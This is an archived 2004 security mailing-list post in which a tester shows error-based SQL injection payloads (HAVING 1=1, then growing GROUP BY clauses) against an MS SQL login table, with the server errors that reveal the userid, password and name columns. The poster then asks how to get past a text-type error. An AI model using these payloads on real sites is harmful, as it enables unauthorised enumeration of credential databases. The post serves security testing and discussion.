WebApp Sec mailing list archives
Enumerating databases...
From: KrK <krk41 () yahoo com>
Date: Sun, 19 Sep 2004 11:29:09 -0700 (PDT)
Hi List, I have been doing testing of a web site and have found all the errors as detailed in the advanced sql injection paper by ngsoftware and in Hacme bank. I have been stuck on the way because of a different error and am unable to enumerate the database further. Here is the list of tests that i have done and the corresponding output, if anyone could suggest on how to enumerate the rest of the table fields it would be great. step 1: userid='%20having%201%3d1%2d%2d (encoded form of ' having 1=1--) result 1: Column 'logindetls.userid' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. step 2:'%20GROUP%20BY%20logindetls.userid%20having%201=1-- result 2: Column 'logindetls.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. step 3:userid='%20GROUP%20BY%20logindetls.userid,logindetls.password%20having%201 =1-- result 3: Column 'logindetls.name' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. and so on and so forth until i reach a point where i get this error: [Microsoft][ODBC SQL Server Driver][SQL Server]:the text, ntext, and image data types cannot be compared or sorted, except when using IS NULL or LIKE operator The application, i feel, stores text data in one of the fields which results in the generation of this error.Has anyone in the list come across this? any clues on how to enumerate the database further? Thanking you, Krk ===== " DON'T WORRY BE HAPPY, EVERY NIGHT YOU HAVE SOME TROUBLE, IF YOU WORRY YOU MAKE IT DOUBLE, SO DON'T WORRY BE HAPPY NOW...." __________________________________ Do you Yahoo!? Yahoo! Mail - 50x more storage than other providers! http://promotions.yahoo.com/new_mail
Current thread:
- Enumerating databases... KrK (Sep 21)